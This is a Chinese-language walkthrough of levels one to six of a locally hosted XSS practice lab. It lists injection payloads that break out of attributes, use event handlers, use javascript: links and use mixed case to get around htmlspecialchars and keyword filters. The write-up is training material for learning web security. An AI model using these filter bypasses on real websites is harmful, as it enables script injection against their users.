环境搭建

1、靶场地址
2、小皮面板
3、windows机器
4、把压缩包解压，放在www目录下，然后访问即可

实验步骤

第一关

直接输入就行：<script>alert('xss')</script>

第二关

"> <script>alert('xss')</script><"闭合前面同时也闭合后面的内容

第三关

使用上面的弹窗语句，发现被转义了

拿出函数后，发现双引号已经被注释成"

<input name="keyword" value="&quot;><script>alert(&quot;xss&quot;)</script><&quot;">

发现双引号被转义后，我们尝试使用单引号绕过，但是<又被转义了，我真的是服了

输入参数：'><script>alert('xss')</script><'
页面参数：<input name="keyword" value="" &gt;&lt;script&gt;alert('xss')&lt;="" script&gt;&lt;''="">

查看源码发现一个奇怪的参数

我们看看他的含义，发现就是转义函数
htmlspecialchars

换个参数，' onclick="alert('xxs') '，表示当用户点击方框后弹窗

他单引号转成双引号恰恰是我们需要的，改一下poc' onclick='alert(/xxs/) '

过！

当然，你也可以使用另一个事件绕过：'onmouseover='alert(/当鼠标悬停时弹窗/)'，同样的把单引号换成斜杠！

测试的时候建议本地搭建环境，只有本地能弹窗，靶场才可能弹窗

第四关

套用上面的代码，发现过不了

f12检查，发现前后两端是双引号，我们把单引号改成双引号试试

" οnclick="alert(/xxs/) "

点击方框后，成功过关

第五关

老规矩，吃老本

这里很奇怪啊，为什么会转义第一个字母，模糊测试试了一下。

看一下源码，这里匹配的很硬核啊

由于懒得折腾，<script>和on开头的函数我不会再用了，哈哈

我用a标签试试

"><a href=javascript:alert(1)>

点后面的括号，直接过！

第六关

老规矩，吃老本

"><a href=javascript:alert(1)>

这里的href被转义成了hr_ef，用大小写绕过

看看源码，多了两个匹配项目

先到这里，后期情况更新